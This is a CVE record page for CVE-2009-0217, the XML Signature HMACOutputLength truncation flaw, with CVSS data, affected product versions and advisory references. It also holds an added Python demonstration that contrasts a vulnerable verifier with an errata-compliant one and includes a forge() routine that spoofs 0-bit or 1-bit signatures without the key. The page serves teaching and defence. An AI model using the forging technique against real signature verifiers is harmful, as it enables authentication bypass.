CVE-2009-0217
Summary
| CVE | CVE-2009-0217 |
|---|---|
| State | PUBLISHED |
| Assigner | certcc |
| Source Priority | CVE Program / NVD first with legacy fallback |
| Published | 2009-07-14 23:30:00 UTC |
| Updated | 2026-04-23 00:35:47 UTC |
| Description | The design of the W3C XML Signature Syntax and Processing (XMLDsig) recommendation, as implemented in products including (1) the Oracle Security Developer Tools component in Oracle Application Server 10.1.2.3, 10.1.3.4, and 10.1.4.3IM; (2) the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6; (3) Mono before 2.4.2.2; (4) XML Security Library before 1.2.12; (5) IBM WebSphere Application Server Versions 6.0 through 6.0.2.33, 6.1 through 6.1.0.23, and 7.0 through 7.0.0.1; (6) Sun JDK and JRE Update 14 and earlier; (7) Microsoft .NET Framework 3.0 through 3.0 SP2, 3.5, and 4.0; and other products uses a parameter that defines an HMAC truncation length (HMACOutputLength) but does not require a minimum for this length, which allows attackers to spoof HMAC-based signatures and bypass authentication by specifying a truncation length with a small number of bits. |
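The flaw the description summarizes is in the verifier's handling of the optional `HMACOutputLength` child of `ds:SignatureMethod`: the 2008 Recommendation let a message declare how many leftmost bits of the HMAC to compare, but set no floor, so a message that declares 1 bit (or 0) reduces the forgery effort to at most two guesses. The following is an added example written for this page, not code from any of the products or libraries listed above. It models a minimal HMAC-SHA1 XML Signature verifier in two forms: one that honours any declared length, and one that enforces the minimum adopted in the W3C errata referenced below (at least 80 bits and at least half the digest length, the RFC 2104 truncation rule; some vendor fixes go further and refuse truncation entirely). Canonicalization is deliberately skipped, the raw serialization of `ds:SignedInfo` stands in for the C14N octets, and the key, the `ds:Signature` skeleton and the `#order` reference are all constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import xml.etree.ElementTree as ET

DS = "http://www.w3.org/2000/09/xmldsig#"
NS = {"ds": DS}
HMAC_SHA1 = DS + "hmac-sha1"
ET.register_namespace("ds", DS)

# Constructed demo key; the attacker modelled below never learns it.
DEMO_KEY = b"constructed-demo-key-not-from-any-advisory"


def leftmost_bits(data: bytes, nbits: int) -> bytes:
    """Keep the leftmost nbits of data (RFC 2104 style truncation)."""
    out = bytearray(data[:(nbits + 7) // 8])
    if nbits % 8 and out:
        out[-1] &= (0xFF << (8 - nbits % 8)) & 0xFF
    return bytes(out)


def signed_octets(signed_info) -> bytes:
    # Simplification: a real verifier applies CanonicalizationMethod first.
    return ET.tostring(signed_info)


def build_signature(hmac_output_length, sig_bytes, ref_uri="#order"):
    """Constructed ds:Signature. In a real message both HMACOutputLength and
    SignatureValue are under the sender's control."""
    hol = ("" if hmac_output_length is None else
           f"<ds:HMACOutputLength>{hmac_output_length}</ds:HMACOutputLength>")
    return (
        f'<ds:Signature xmlns:ds="{DS}"><ds:SignedInfo>'
        '<ds:CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>'
        f'<ds:SignatureMethod Algorithm="{HMAC_SHA1}">{hol}</ds:SignatureMethod>'
        f'<ds:Reference URI="{ref_uri}"><ds:DigestMethod Algorithm="{DS}sha1"/>'
        "<ds:DigestValue>AAAAAAAAAAAAAAAAAAAAAAAAAAA=</ds:DigestValue></ds:Reference>"
        "</ds:SignedInfo>"
        f"<ds:SignatureValue>{base64.b64encode(sig_bytes).decode()}</ds:SignatureValue>"
        "</ds:Signature>"
    ).encode()


def parse(xml_bytes):
    """Return (SignedInfo element, declared output bits, decoded SignatureValue)."""
    root = ET.fromstring(xml_bytes)
    si = root.find("ds:SignedInfo", NS)
    sm = si.find("ds:SignatureMethod", NS)
    if sm.get("Algorithm") != HMAC_SHA1:
        raise ValueError("unsupported SignatureMethod")
    hol = sm.find("ds:HMACOutputLength", NS)
    nbits = int(hol.text) if hol is not None else hashlib.sha1().digest_size * 8
    sig = base64.b64decode(root.find("ds:SignatureValue", NS).text or "")
    return si, nbits, sig


def _mac(key, si):
    return hmac.new(key, signed_octets(si), hashlib.sha1).digest()


def verify_vulnerable(xml_bytes, key) -> bool:
    """Pre-errata behaviour: whatever HMACOutputLength the message declares is
    honoured, down to 1 or even 0 bits."""
    si, nbits, sig = parse(xml_bytes)
    return hmac.compare_digest(leftmost_bits(_mac(key, si), nbits),
                               leftmost_bits(sig, nbits))


def verify_fixed(xml_bytes, key) -> bool:
    """Errata rule: HMACOutputLength must be at least 80 bits and at least half
    the digest length, and may not exceed the digest length."""
    si, nbits, sig = parse(xml_bytes)
    digest_bits = hashlib.sha1().digest_size * 8
    if not max(80, digest_bits // 2) <= nbits <= digest_bits:
        raise ValueError(f"HMACOutputLength {nbits} rejected")
    return hmac.compare_digest(leftmost_bits(_mac(key, si), nbits),
                               leftmost_bits(sig, nbits))


def fixed_rejects(xml_bytes, key) -> bool:
    """True when the hardened verifier refuses the declared length outright."""
    try:
        verify_fixed(xml_bytes, key)
    except ValueError:
        return True
    return False


def sign(key, hmac_output_length=None):
    """Legitimate signer: HMAC over SignedInfo, truncated as declared."""
    si, nbits, _ = parse(build_signature(hmac_output_length, b""))
    return build_signature(hmac_output_length, leftmost_bits(_mac(key, si), nbits))


def forge(accepts, hmac_output_length=1):
    """Attacker with no key: declare a 1-bit HMACOutputLength, then submit the
    only two possible truncated values. `accepts` models the server's check."""
    for guess in (b"\x00", b"\x80"):
        doc = build_signature(hmac_output_length, guess)
        if accepts(doc):
            return doc
    return None


if __name__ == "__main__":
    good = sign(DEMO_KEY)
    print("legit, full length:", verify_vulnerable(good, DEMO_KEY), verify_fixed(good, DEMO_KEY))
    forged = forge(lambda d: verify_vulnerable(d, DEMO_KEY))
    print("forged 1-bit, vulnerable verifier:", verify_vulnerable(forged, DEMO_KEY))
    print("forged 1-bit, fixed verifier rejects:", fixed_rejects(forged, DEMO_KEY))
    print("0-bit, vulnerable verifier:", verify_vulnerable(build_signature(0, b""), DEMO_KEY))
```

Two details are worth noticing. With `HMACOutputLength` of 0 the truncated values are both empty, so the comparison succeeds on the first attempt without any guessing; with 1 bit the attacker needs at most two submissions. The hardened verifier has to validate the declared length before it computes anything, and it has to fail closed rather than fall back to a default, because the length is part of the attacker-controlled `SignedInfo`; when auditing a verifier for this class of bug, also check that the length is read from the parsed signature the verifier actually computed over and not from a separate copy of the message.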
Risk And Classification
Primary CVSS: v2.0 base score 5.0 (source: [email protected])
AV:N/AC:L/Au:N/C:N/I:P/A:N
Problem Types: NVD-CWE-Other | n/a
CVSS v2.0 Breakdown
| Metric | Value |
|---|---|
| Access Vector | Network |
| Access Complexity | Low |
| Authentication | None |
| Confidentiality | None |
| Integrity | Partial |
| Availability | None |
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
NVD Known Affected Configurations (CPE 2.3)
| Type | Vendor | Product | Version | Update | Edition | Language |
|---|---|---|---|---|---|---|
| Application | Ibm | Websphere Application Server | 6.0 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.0.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.0.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.0.3 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.11 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.13 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.15 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.17 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.3 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.5 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.7 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.1.9 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2 | All | fp17 | All |
| Application | Ibm | Websphere Application Server | 6.0.2.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.10 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.11 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.12 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.13 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.14 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.15 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.16 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.17 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.18 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.19 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.20 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.21 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.22 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.23 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.24 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.25 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.28 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.29 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.3 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.30 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.31 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.32 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.0.2.33 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.0 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.1 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.10 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.11 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.12 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.13 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.14 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.15 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.16 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.17 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.18 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.19 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.2 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.20 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.21 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.22 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.23 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.3 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.4 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.5 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.6 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.7 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.8 | All | All | All |
| Application | Ibm | Websphere Application Server | 6.1.0.9 | All | All | All |
| Application | Ibm | Websphere Application Server | 7.0 | All | All | All |
| Application | Ibm | Websphere Application Server | 7.0.0.1 | All | All | All |
| Application | Mono Project | Mono | 1.2.1 | All | All | All |
| Application | Mono Project | Mono | 1.2.2 | All | All | All |
| Application | Mono Project | Mono | 1.2.3 | All | All | All |
| Application | Mono Project | Mono | 1.2.4 | All | All | All |
| Application | Mono Project | Mono | 1.2.5 | All | All | All |
| Application | Mono Project | Mono | 1.2.6 | All | All | All |
| Application | Mono Project | Mono | 1.9 | All | All | All |
| Application | Mono Project | Mono | 2.0 | All | All | All |
| Application | Oracle | Application Server | 10.1.2.3 | All | All | All |
| Application | Oracle | Application Server | 10.1.3.4 | All | All | All |
| Application | Oracle | Application Server | 10.1.4.3im | All | All | All |
| Application | Oracle | Bea Product Suite | 10.0 | mp1 | All | All |
| Application | Oracle | Bea Product Suite | 10.3 | All | All | All |
| Application | Oracle | Bea Product Suite | 8.1 | sp6 | All | All |
| Application | Oracle | Bea Product Suite | 9.0 | All | All | All |
| Application | Oracle | Bea Product Suite | 9.1 | All | All | All |
| Application | Oracle | Bea Product Suite | 9.2 | mp3 | All | All |
| Application | Oracle | Weblogic Server Component | 10.0 | mp1 | All | All |
| Application | Oracle | Weblogic Server Component | 10.3 | All | All | All |
| Application | Oracle | Weblogic Server Component | 8.1 | sp6 | All | All |
| Application | Oracle | Weblogic Server Component | 9.0 | All | All | All |
| Application | Oracle | Weblogic Server Component | 9.1 | All | All | All |
| Application | Oracle | Weblogic Server Component | 9.2 | mp3 | All | All |
Vendor Declared Affected Products
References
| Reference | Source | Link | Tags |
|---|---|---|---|
| SecurityTracker.com Archives - WebLogic Server Bugs Let Remote Users Gain Access and Modify Data and Deny Service | af854a3a-2127-422b-91ae-364da2661108 | www.securitytracker.com | |
| 511915 – (CVE-2009-0217) CVE-2009-0217 xmlsec1, mono, xml-security-c, xml-security-1.3.0-1jpp.ep1.*: XMLDsig HMAC-based signatures spoofing and authentication bypass | af854a3a-2127-422b-91ae-364da2661108 | bugzilla.redhat.com | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| IBM WebSphere Application Server Multiple Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Bug 47526 – XML signature HMAC truncation authentication bypass | af854a3a-2127-422b-91ae-364da2661108 | issues.apache.org | |
| OpenOffice.org 3 Multiple Vulnerabilities - Advisories - Community | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Security | af854a3a-2127-422b-91ae-364da2661108 | blogs.sun.com | |
| OpenOffice.org 2 Multiple Vulnerabilities - Advisories - Community | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| SUSE update for OpenOffice_org - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Vulnerabilities - Mono | af854a3a-2127-422b-91ae-364da2661108 | www.mono-project.com | Vendor Advisory |
| VUPEN security advisory (title not preserved; link now redirects to an unrelated OVH webmail page) | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | |
| Mono XML Signature HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| Debian -- Security Information -- DSA-1995-1 openoffice.org | af854a3a-2127-422b-91ae-364da2661108 | www.debian.org | |
| 47527 – XML signature HMAC truncation authentication bypass | af854a3a-2127-422b-91ae-364da2661108 | issues.apache.org | |
| IBM PK80596: Possible security exposure with XML digital signature - United States | af854a3a-2127-422b-91ae-364da2661108 | www-01.ibm.com | Patch, Vendor Advisory |
| RSA Security, Inc. Information for VU#466161 | af854a3a-2127-422b-91ae-364da2661108 | www.kb.cert.org | |
| Oracle Critical Patch Update Pre-Release Announcement - October 2010 | af854a3a-2127-422b-91ae-364da2661108 | www.oracle.com | |
| [SECURITY] Fedora 11 Update: java-1.6.0-openjdk-1.6.0.0-27.b16.fc11 | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| XML Security Library | af854a3a-2127-422b-91ae-364da2661108 | www.aleksey.com | |
| VUPEN security advisory (title not preserved; link now redirects to an unrelated OVH webmail page) | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | Patch, Vendor Advisory |
| [security-announce] SUSE Security Announcement: IBM Java 6 (SUSE-SA:2009 | af854a3a-2127-422b-91ae-364da2661108 | lists.opensuse.org | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| Ubuntu update for openoffice.org - Advisories - Community | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Microsoft Security Bulletin MS10-041 - Important | Microsoft Docs | af854a3a-2127-422b-91ae-364da2661108 | docs.microsoft.com | |
| HP-UX update for JRE / JDK - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Repository / Oval Repository | af854a3a-2127-422b-91ae-364da2661108 | oval.cisecurity.org | |
| IBM PK80627; Possible security exposure with XML digital signature. - United States | af854a3a-2127-422b-91ae-364da2661108 | www-01.ibm.com | Patch, Vendor Advisory |
| Fedora update for java-1.6.0-openjdk - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| sunsolve.sun.com/search/document.do | af854a3a-2127-422b-91ae-364da2661108 | sunsolve.sun.com | |
| US-CERT Vulnerability Note VU#466161 | af854a3a-2127-422b-91ae-364da2661108 | www.kb.cert.org | US Government Resource |
| git.gnome.org repository link (title not preserved; link now redirects to a GitLab sign-in page) | af854a3a-2127-422b-91ae-364da2661108 | git.gnome.org | |
| [SECURITY] Fedora 10 Update: java-1.6.0-openjdk-1.6.0.0-20.b16.fc10 | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| Oracle Critical Patch Update Advisory - July 2009 | af854a3a-2127-422b-91ae-364da2661108 | www.oracle.com | |
| Apache XML Security HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| '[security bulletin] HPSBUX02476 SSRT090250 rev.1 - HP-UX Running Java, Remote Increase in Privilege,' - MARC | af854a3a-2127-422b-91ae-364da2661108 | marc.info | |
| Red Hat update for java-1.6.0-ibm - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| #125136-16: Obsoleted by: 125136-17 JavaSE for business 6: update 15 patch (equivalent to JDK 6u15) | af854a3a-2127-422b-91ae-364da2661108 | sunsolve.sun.com | |
| CVE-2009-0217 | af854a3a-2127-422b-91ae-364da2661108 | www.openoffice.org | |
| Repository / Oval Repository | af854a3a-2127-422b-91ae-364da2661108 | oval.cisecurity.org | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| USN-903-1: OpenOffice.org vulnerabilities | Ubuntu | af854a3a-2127-422b-91ae-364da2661108 | www.ubuntu.com | |
| APPLE-SA-2009-09-03-1 Java for Mac OS X 10.5 Update 5 | af854a3a-2127-422b-91ae-364da2661108 | lists.apple.com | |
| IBM Possible security exposure with XML digital signature with IBM WebSphere Application Server (PK80596 and PK80627) - United States | af854a3a-2127-422b-91ae-364da2661108 | www-01.ibm.com | Patch, Vendor Advisory |
| VUPEN security advisory (title not preserved; link now redirects to an unrelated OVH webmail page) | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | |
| VUPEN security advisory (title not preserved; link now redirects to an unrelated OVH webmail page) | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | Patch, Vendor Advisory |
| Red Hat advisory link (title not preserved; link now resolves to a generic support page) | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| Sun Microsystems, Inc. Information for VU#466161 | af854a3a-2127-422b-91ae-364da2661108 | www.kb.cert.org | |
| osvdb.org/55907 | af854a3a-2127-422b-91ae-364da2661108 | osvdb.org | |
| SecurityTracker.com Archives - Java Runtime Environment (JRE) XML Digital Signature Flaw May Let Remote Users Bypass Authentication | af854a3a-2127-422b-91ae-364da2661108 | www.securitytracker.com | |
| Oracle Critical Patch Update Advisory - October 2009 | af854a3a-2127-422b-91ae-364da2661108 | www.oracle.com | |
| Red Hat update for java-1.6.0-sun - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| Oracle Open Office Multiple Vulnerabilities - Advisories - Community | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Sun Java JDK / JRE XML Signature HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| IETF and W3C XML Digital Signature Specification HMAC Truncation Authentication Bypass Vulnerability | af854a3a-2127-422b-91ae-364da2661108 | www.securityfocus.com | Patch |
| HMAC truncation in XML Signature: When Alice didn't look. - W3C Blog | af854a3a-2127-422b-91ae-364da2661108 | www.w3.org | Vendor Advisory |
| Advisories | Mandriva | af854a3a-2127-422b-91ae-364da2661108 | www.mandriva.com | |
| US-CERT Technical Cyber Security Alert TA10-159B -- Microsoft Updates for Multiple Vulnerabilities | af854a3a-2127-422b-91ae-364da2661108 | www.us-cert.gov | US Government Resource |
| sunsolve.sun.com/search/document.do | af854a3a-2127-422b-91ae-364da2661108 | sunsolve.sun.com | |
| [SECURITY] Fedora 10 Update: xmlsec1-1.2.12-1.fc10 | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| Oracle Products Multiple Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| VUPEN security advisory (title not preserved; link now redirects to an unrelated OVH webmail page) | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| Secunia advisory (title not preserved; link now redirects to a Flexera "About Secunia Research" page) | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| SecurityTracker.com Archives - Oracle Application Server Bugs Let Remote Users Modify Data | af854a3a-2127-422b-91ae-364da2661108 | www.securitytracker.com | |
| Gentoo Linux Documentation -- OpenOffice, LibreOffice: Multiple vulnerabilities | af854a3a-2127-422b-91ae-364da2661108 | www.gentoo.org | |
| VUPEN security advisory (title not preserved; link now redirects to an unrelated OVH webmail page) | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | |
| git.gnome.org repository link (title not preserved; link now redirects to a GitLab sign-in page) | af854a3a-2127-422b-91ae-364da2661108 | git.gnome.org | |
| [Apache-SVN] Revision 794013 | af854a3a-2127-422b-91ae-364da2661108 | svn.apache.org | |
| Errata for XML Signature 2nd Edition | af854a3a-2127-422b-91ae-364da2661108 | www.w3.org | Vendor Advisory |
| rhn.redhat.com | Red Hat Support | af854a3a-2127-422b-91ae-364da2661108 | rhn.redhat.com | |
| RSA Products XML Signature HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| Security Advisory SA60799 - Gentoo openoffice Multiple Vulnerabilties - Secunia | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | |
| Red Hat update for java-1.6.0-openjdk - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| XML Security Library XML Signature HMAC Truncation Spoofing - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| [SECURITY] Fedora 11 Update: xmlsec1-1.2.12-1.fc11 | af854a3a-2127-422b-91ae-364da2661108 | www.redhat.com | |
| Repository / Oval Repository | af854a3a-2127-422b-91ae-364da2661108 | oval.cisecurity.org | |
| VUPEN security advisory (title not preserved; link now redirects to an unrelated OVH webmail page) | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | Patch, Vendor Advisory |
| Ubuntu update for mono - Secunia Advisories - Vulnerability Information - Secunia.com | af854a3a-2127-422b-91ae-364da2661108 | secunia.com | Vendor Advisory |
| #263429: A Security Vulnerability With Verifying HMAC-based XML Digital Signatures in the XML Digital Signature Implementation Included With the Java Runtime Environment (JRE) may Allow Authentication to be Bypassed | af854a3a-2127-422b-91ae-364da2661108 | sunsolve.sun.com | |
| [security-announce] SUSE Security Announcement: OpenOffice.org (SUSE-SA: | af854a3a-2127-422b-91ae-364da2661108 | lists.opensuse.org | |
| US-CERT Technical Cyber Security Alert TA09-294A -- Oracle Updates for Multiple Vulnerabilities | af854a3a-2127-422b-91ae-364da2661108 | www.us-cert.gov | US Government Resource |
| osvdb.org/55895 | af854a3a-2127-422b-91ae-364da2661108 | osvdb.org | |
| VUPEN security advisory (title not preserved; link now redirects to an unrelated OVH webmail page) | af854a3a-2127-422b-91ae-364da2661108 | www.vupen.com | Patch, Vendor Advisory |
| USN-826-1: Mono vulnerabilities | Ubuntu security notices | af854a3a-2127-422b-91ae-364da2661108 | usn.ubuntu.com | |
| CVE Program record | CVE.ORG | www.cve.org | canonical |
| NVD vulnerability detail | NVD | nvd.nist.gov | canonical, analysis |
No vendor comments have been submitted for this CVE.
There are currently no legacy QID mappings associated with this CVE.